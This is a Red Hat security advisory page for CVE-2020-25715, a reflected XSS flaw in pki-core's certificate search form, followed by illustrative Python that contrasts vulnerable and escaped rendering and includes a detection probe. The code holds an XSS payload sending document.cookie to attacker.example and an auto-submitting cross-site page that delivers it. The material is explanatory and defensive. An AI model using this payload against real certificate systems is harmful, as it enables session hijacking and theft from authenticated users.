Bug 1891016 (CVE-2020-25715)

Summary: | CVE-2020-25715 pki-core: XSS in the certificate search results | |
---|---|---|---
Product: | [Other] Security Response | Reporter: | Cedric Buissart <cbuissar>
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team>
Status: | CLOSED ERRATA | QA Contact: |
Severity: | medium | Docs Contact: |
Priority: | medium | |
Version: | unspecified | CC: | abokovoy, alee, alexander.m.scheel, cfu, dsirrine, edewata, jmagne, kwright, mharmsen, mkdineshprasanth, psampaio, rhcs-maint, security-response-team
Target Milestone: | --- | Keywords: | Security
Target Release: | --- | |
Hardware: | All | |
OS: | Linux | |
Whiteboard: | | |
Fixed In Version: | pki-core 10.9.0 | Doc Type: | If docs needed, set a value
Doc Text: | A flaw was found in pki-core. A specially crafted POST request can be used to reflect a DOM-based cross-site scripting (XSS) attack to inject code into the search query form which can get automatically executed. The highest threat from this vulnerability is to data integrity. | |
Story Points: | --- | |
Clone Of: | | Environment: |
Last Closed: | 2021-03-15 17:25:48 UTC | Type: | ---
Regression: | --- | Mount Type: | ---
Documentation: | --- | CRM: |
Verified Versions: | | Category: | ---
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: |
Cloudforms Team: | --- | Target Upstream Version: |
Embargoed: | | |
Bug Depends On: | 1426572, 1898055, 1903211, 1934142, 1934278, 1934676, 1934678, 1940561, 1945155, 1945156, 1945157 | |
Bug Blocks: | 1891015 | |
Description
Cedric Buissart
2020-10-23 14:42:25 UTC
Mitigation: Because the cross-site scripting (XSS) attack requires the victim to have their RHCS certificate installed in their web browser to be successful, it is recommended that the web browser not hold the keys and that the user use the command line interface (CLI) instead.

Created pki-core tracking bugs for this issue:

Affects: fedora-all [bug 1934142]

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.6 Extended Update Support

Via RHSA-2021:0819 https://access.redhat.com/errata/RHSA-2021:0819

This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2020-25715

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7

Via RHSA-2021:0851 https://access.redhat.com/errata/RHSA-2021:0851

Statement: Red Hat Enterprise Linux 8.3 (pki-core 10.9.4) contains mitigations that prevent the vulnerability from being exploited. Red Hat Enterprise Linux version 8 prior to 8.3 is vulnerable to this issue.

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.7 Extended Update Support

Via RHSA-2021:0975 https://access.redhat.com/errata/RHSA-2021:0975

This issue has been addressed in the following products:

Red Hat Enterprise Linux 8.2 Extended Update Support

Via RHSA-2021:1263 https://access.redhat.com/errata/RHSA-2021:1263
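The bug class behind the Doc Text and the Mitigation above, as an added example that is not code from pki-core or from Red Hat: the page gives no source, so the endpoint path `/search`, the POST parameter name `query`, the HTML skeleton and the function names below are assumptions chosen to show a search form that echoes a POSTed value into an HTML attribute unescaped, beside the hardened rendering, together with a check that tells the two apart on a constructed payload. The reason the Mitigation focuses on browser-held client certificates is visible in the attack shape: the attacker only needs the victim's browser to submit a form to the PKI server, and a browser that holds the RHCS certificate authenticates that cross-site POST automatically, so the reflected script runs inside the authenticated session.

```python
"""Reflected XSS in a search form: vulnerable renderer, hardened renderer, and a probe.

Illustrative code only (not pki-core's). Endpoint, parameter name and markup
are hypothetical stand-ins for the certificate search form the advisory describes.
"""
import html
import re
from urllib.parse import parse_qs, urlencode

# Constructed payload: breaks out of the value="..." attribute and injects a
# script element that exfiltrates document.cookie to an attacker host.
PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'

# Constructed POST body, exactly what an auto-submitting form on an attacker
# page would send to /search from the victim's browser.
ATTACK_BODY = urlencode({"query": PAYLOAD})


def vulnerable_search_form(params: dict) -> str:
    """Echo the submitted query straight into the form (the bug class)."""
    query = params.get("query", [""])[0]
    return (
        '<form method="POST" action="/search">'
        f'<input name="query" value="{query}">'
        "</form>"
    )


def hardened_search_form(params: dict) -> str:
    """Same page with output encoding appropriate for an HTML attribute value.

    html.escape(..., quote=True) turns < > & " ' into entities, so the payload
    can no longer close the attribute or open a new element.
    """
    query = params.get("query", [""])[0]
    return (
        '<form method="POST" action="/search">'
        f'<input name="query" value="{html.escape(query, quote=True)}">'
        "</form>"
    )


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def reflects_active_content(render, body: str) -> bool:
    """Probe: does a raw <script> element from the POST body survive into the response?

    `render` is the page renderer under test; `body` is the URL-encoded POST body.
    An entity-encoded '&lt;script' does not match, which is the point.
    """
    params = parse_qs(body, keep_blank_values=True)
    return bool(SCRIPT_TAG.search(render(params)))


def attacker_page(target_url: str) -> str:
    """Constructed cross-site page: submits the payload to the target on load.

    No credentials appear here; a browser holding the victim's client certificate
    presents it during the TLS handshake to target_url on its own.
    """
    return (
        f'<form id="f" method="POST" action="{html.escape(target_url, quote=True)}">'
        f'<input type="hidden" name="query" value="{html.escape(PAYLOAD, quote=True)}">'
        "</form><script>document.getElementById('f').submit()</script>"
    )


if __name__ == "__main__":
    for name, render in (("vulnerable", vulnerable_search_form),
                         ("hardened", hardened_search_form)):
        print(f"{name}: script reflected = {reflects_active_content(render, ATTACK_BODY)}")
        print("  ", render(parse_qs(ATTACK_BODY, keep_blank_values=True)))
```

The probe is deliberately narrow (a literal `<script` in the response) so that it cannot be fooled by a renderer that strips only quotes; a broader scanner would also check event-handler attributes and `javascript:` URLs, but the test here is whether the attribute context is encoded at all.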